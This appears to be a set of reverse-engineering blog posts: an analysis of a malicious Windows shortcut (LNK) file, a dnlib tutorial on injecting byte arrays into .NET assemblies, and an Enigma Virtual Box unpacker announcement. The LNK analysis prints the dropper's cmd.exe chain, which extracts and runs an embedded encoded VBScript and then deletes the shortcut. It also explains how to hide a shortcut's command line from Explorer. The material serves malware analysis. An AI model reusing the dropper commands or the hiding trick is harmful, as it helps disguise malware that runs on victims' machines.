Well, there are lots of changes but which one(-s) are causing the Explorer cockup F-Secure is mentioning? There are two ways to find it - debugging Windows Explorer shell, or making a test LNK file and filling it with zeroes until Explorer breaks. First one would be fun, but second one will be definitely faster. πŸ˜‰

After few attempts, I found the culprit: it's the modified EnvironmentDataBlock.

So, now you know. Adding empty EnvironmentDataBlock to any shortcut and setting ShellLinkHeader.LinkFlags.HasExpString = 1 will cause Windows Explorer to hide your command-line (but not exe name) from the user. 😈

Command line magic and steganography

I wanted to finish my analysis but some things were still bugging me.
lnk_template_extra_data
What are these data after the end-of-file marker? And why is this LNK file 500+KB in size?

The answer is simple - it's using steganography to hide malicious VBScript inside.

Let's look at the commands passed to cmd.exe, I'll just prettify them a bit. To do it properly, you need to know about command prompt escape characters, like "^" (at first I didn't and FSecure got it wrong in their blogpost, too! πŸ˜‰ ). These are the actual commands:

copy *.jpg.lnk %tmp%
%systemdrive%
cd %tmp%
dir /b /s *.jpg.lnk>o
echo set /p f=^<o>.bat
echo type "%f%"^>z9>>.bat
echo findstr /R /C:"#@~" z9^>1.vbe^&cscript 1.vbe^&del *.lnk /S /Q /Y>>.bat
.bat

First few lines are copying our LNK file to TEMP folder. Remember, FSecure analysis says that LNK file was originally called fotomama.jpg.lnk. πŸ˜‰
dir command is printing full filename of our evil file into another file named "o".
echo lines are generating file .bat.
And finally .bat is executed.

So, what is being written into .bat?

set /p f=<o
type "%f%">z9
findstr /R /C:"#@~" z9>1.vbe&cscript 1.vbe&del *.lnk /S /Q /Y

First 2 lines just copy our evil file to z9. I really don't know why file copy is done via environment variables, maybe it's some sort of anti-antivirus trick to hide the malware origin.
findstr treats z9 as text file and copies all "lines" of text that contain "#@~" into a file 1.vbe. If you Google a bit, you'll learn that encrypted VBScript files have extension .vbe, consist of one long string and start with magic bytes "#@~^"".
Then a script gets executed, LNK file deleted and stupid user ends up being pwned. πŸ™‚

Now, the bytes after end-of-file marker in LNK file start to make sense. 0x0A is new-line that's necessary for findstr, and then comes encrypted VBScript. Nice example of steganography, lots of black command-prompt scripting magic, I really like it! πŸ˜‰

Decoding VBE file and analyzing it - that's a matter of another blog post. Yes, it's really on my todo list.

Fixed LNK Template

I spent few more evenings working on the LNK template. It was just bugging me, to have something so useful, yet so terribly broken. So, I'm happy to present a fully reworked version that should be much more stable and able to deal with malicious LNK files in much better fashion.

Download link: https://www.mediafire.com/?zvrlmjy9v9m3ed3

Final thoughts

This was a fun evening project. I learned a lot about 010Editor Binary Templates, learned something new about LNK files and got a refresher course in CMD scripting and steganography. Writing this post took much much more time than the actual research, though.

If you want to have some fun too, you can use my 010Editor Template to edit your LNK files. Or make a simple tool in C#. Or create a LNK obfuscation service webpage in PHP. Possibilities are endless! πŸ™‚

Obviously I won't give out link to an actual malware (if Google is your friend, you can find it anyway) but here's a demo LNK file I put together just for fun: http://www.mediafire.com/?gmphyn0mkmmyuag

It's harmless, trust me! πŸ˜€

Useful links

FSecure post that started my adventure
Original LNK Template
Official LNK specification by Microsoft
Overview of LNK file data that are useful for computer forensics

Since you asked.. How to inject byte array using dnlib

kao

Quite often I receive random questions about dnlib from my friends. To be honest, I have no idea why they think I know the answers to life the universe and everything else. πŸ™‚ So, in this series of posts I'll attempt to solve their problems - and hope that the solution helps someone else too.

So, today's question is:

We're trying to add a byte array to an assembly using dnlib. We wrote some code* but dnlib throws exception when saving modified assembly:
An unhandled exception of type 'dnlib.DotNet.Writer.ModuleWriterException' occurred in dnlib.dll
Additional information: Field System.Byte[] ::2026170854 (04000000) initial value size != size of field type

I gave the friend the standard answer - make a sample app, see how it looks and then implement it with dnlib. Seriously, how hard can it be? πŸ™‚

Well, array initialization in .NET is anything but simple.

How arrays are initialized in C#

Note - the following explanation is shamelessly copied from "Maximizing .NET Performance" by Nick Wienholt. It's a very nice book but getting little outdated. You can Google for "Apress.Maximizing.Dot.NET.Performance.eBook-LiB", if interested.

Value type array initialization in C# can be achieved in two distinct waysβ€”inline with the array variable declaration, and through set operations on each individual array element, as shown in the following snippet:

//inline
int[] arrInline = new int[]{0,1,2};

//set operation per element
int[] arrPerElement = new int[3];
arrPerElement[0] = 0;
arrPerElement[1] = 1;
arrPerElement[2] = 2;

For a value type array that is initialized inline and has more than three elements, the C# compiler in both .NET 1.0 and .NET 1.1 generates a type named <PrivateImplementationDetails> that is added to the assembly at the root namespace level. This type contains nested value types that reference the binary data needed to initialize the array, which is stored in a .data section of the PE file. At runtime, the System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray method is called to perform a memory copy of the data referenced by the <PrivateImplementationDetails>Β nested structure into the array's memory location. The direct memory copy is roughly twice as fast for the initialization of a 20-by-20 element array of 64-bit integers, and array initialization syntax is generally cleaner for the inline initialization case.

Say what? You can read the text 3 times and still be no wiser. So, let's make a small sample application and disassemble it.

How array initialization looks in MSIL

Let's start with sample app that does nothing.

using System;
class Program
{
    static byte[] bla = new byte[] {1,2,3,4,5};
    static void Main()
    {
    }
}

Compile without optimizations, and disassemble using ildasm. And even after removing all extra stuff, there's still a lot of code & metadata for such a simple thing. πŸ™‚

.assembly hello {}

.class private auto ansi beforefieldinit Program extends [mscorlib]System.Object
{
  .field public static uint8[] bla

  .method private hidebysig specialname rtspecialname static void  .cctor() cil managed
  {
    ldc.i4.5
    newarr     [mscorlib]System.Byte
    dup
    ldtoken    field valuetype '<PrivateImplementationDetails>{E21EC13E-4669-42C8-B7A5-2EE7FBD85904}'/'__StaticArrayInitTypeSize=5' '<PrivateImplementationDetails>{E21EC13E-4669-42C8-B7A5-2EE7FBD85904}'::'$$method0x6000003-1'
    call       void [mscorlib]System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(class [mscorlib]System.Array, valuetype [mscorlib]System.RuntimeFieldHandle)
    stsfld     uint8[] Program::bla
    ret
  }
}

.data cil I_00002098 = bytearray (01 02 03 04 05) 

.class private auto ansi '<PrivateImplementationDetails>{E21EC13E-4669-42C8-B7A5-2EE7FBD85904}' extends [mscorlib]System.Object
{
  .custom instance void [mscorlib]System.Runtime.CompilerServices.CompilerGeneratedAttribute::.ctor() = ( 01 00 00 00 ) 
  .class explicit ansi sealed nested private '__StaticArrayInitTypeSize=5' extends [mscorlib]System.ValueType
  {
    .pack 1
    .size 5
  }

  .field static assembly valuetype '<PrivateImplementationDetails>{E21EC13E-4669-42C8-B7A5-2EE7FBD85904}'/'__StaticArrayInitTypeSize=5' '$$method0x6000003-1' at I_00002098
}

For one byte array that we declared, compiler created .data directive, 2 static fields, one class and one nested class. And it added a global static constructor. Yikes!

Implementing it in dnlib

Now that we know all the stuff that's required for an array, we can make a tool that will add byte array to an assembly of our choice. To make things simpler, I decided not to create a holder class (named <PrivateImplementationDetails>{E21EC13E-4669-42C8-B7A5-2EE7FBD85904} in the example) and put everything in global module instead.

Note - Since I'm not a .NET/dnlib wizard, I always do it one step at a time, make sure it works and then continue. So, my workflow looks like this: write a code that does X → compile and run it → disassemble the result → verify that result X matches the expected → fix the bugs and repeat. Only after I've tested one thing, I move to the next one.

It also helps to make small test program first. Once you know that your code works as intended, you can use it in a larger project. Debugging the entire ConfuserEx project just to find a small bug in modifications made by someone - it's not fun! So, step-by-step...

First, we need to add the class with layout. It's called '__StaticArrayInitTypeSize=5' in the example above. That's quite simple to do in dnlib:

ModuleDefMD mod = ModuleDefMD.Load(args[0]);
Importer importer = new Importer(mod);
ITypeDefOrRef valueTypeRef = importer.Import(typeof(System.ValueType));
TypeDef classWithLayout = new TypeDefUser("'__StaticArrayInitTypeSize=5'", valueTypeRef);
classWithLayout.Attributes |= TypeAttributes.Sealed | TypeAttributes.ExplicitLayout;
classWithLayout.ClassLayout = new ClassLayoutUser(1, 5);
mod.Types.Add(classWithLayout);

Now we need to add the static field with data, called '$$method0x6000003-1'.

FieldDef fieldWithRVA = new FieldDefUser("'$$method0x6000003-1'", new FieldSig(classWithLayout.ToTypeSig()), FieldAttributes.Static | FieldAttributes.Assembly | FieldAttributes.HasFieldRVA);
fieldWithRVA.InitialValue = new byte[] {1,2,3,4,5};
mod.GlobalType.Fields.Add(fieldWithRVA);

Once that is done, we can add our byte array field, called bla in the example.

ITypeDefOrRef byteArrayRef = importer.Import(typeof(System.Byte[]));
FieldDef fieldInjectedArray = new FieldDefUser("bla", new FieldSig(byteArrayRef.ToTypeSig()), FieldAttributes.Static | FieldAttributes.Public);
mod.GlobalType.Fields.Add(fieldInjectedArray);

That's it, we have all the fields. Now we need to add code to global .cctor to initialize the array properly.

ITypeDefOrRef systemByte = importer.Import(typeof(System.Byte));
ITypeDefOrRef runtimeHelpers = importer.Import(typeof(System.Runtime.CompilerServices.RuntimeHelpers));
IMethod initArray = importer.Import(typeof(System.Runtime.CompilerServices.RuntimeHelpers).GetMethod("InitializeArray", new Type[] { typeof(System.Array), typeof(System.RuntimeFieldHandle) }));

MethodDef cctor = mod.GlobalType.FindOrCreateStaticConstructor();
IList instrs = cctor.Body.Instructions;
instrs.Insert(0, new Instruction(OpCodes.Ldc_I4, 5));
instrs.Insert(1, new Instruction(OpCodes.Newarr, systemByte));
instrs.Insert(2, new Instruction(OpCodes.Dup));
instrs.Insert(3, new Instruction(OpCodes.Ldtoken, fieldWithRVA));
instrs.Insert(4, new Instruction(OpCodes.Call, initArray));
instrs.Insert(5, new Instruction(OpCodes.Stsfld, fieldInjectedArray));

And that's it! Simples!

Further reading

Commented demo code at Pastebin
Longer explanation how array initialization works in C#


Updates

Just to clarify - this is a sample code. It works for me but if it blows up in your project, it's your problem. And there always are some things that can be improved.

• Sometimes I'm overcomplicating things.. You don't need to explicitly import System.Byte, you can use mod.CorLibTypes.Byte for that.

instrs.Insert(1, new Instruction(OpCodes.Newarr, mod.CorLibTypes.Byte.ToTypeDefOrRef()));

SZArraySig is a cleaner but less obvious way to refer to any array. If you need to reference complex arrays, this is better:

FieldDef fieldInjectedArray = new FieldDefUser("bla", new FieldSig(new SZArraySig(mod.CorLibTypes.Byte)), FieldAttributes.Static | FieldAttributes.Public);
mod.GlobalType.Fields.Add(fieldInjectedArray);

Static Enigma Virtual Box unpacker, part 2

kao

Here comes a new version. πŸ™‚ This time I added support for unpacking external packages. "External packages" are data files that can be loaded by Enigma Virtual Box and can contain both embedded files and registry entries.

I also made my unpacker 100% Unicode-aware - there should not be any more problems with non-english filenames. But I had to switch to Delphi 2009 compiler to do this, so there might be some unexpected bugs lurking around.

And, of course, lots of internal bugs had to be fixed. My code is not perfect, you know! πŸ˜‰

EnigmaVB Unpacker v0.30

Download link: Please get latest version from this post

P.S. Thanks to Manofwar for giving me few example files for development & testing!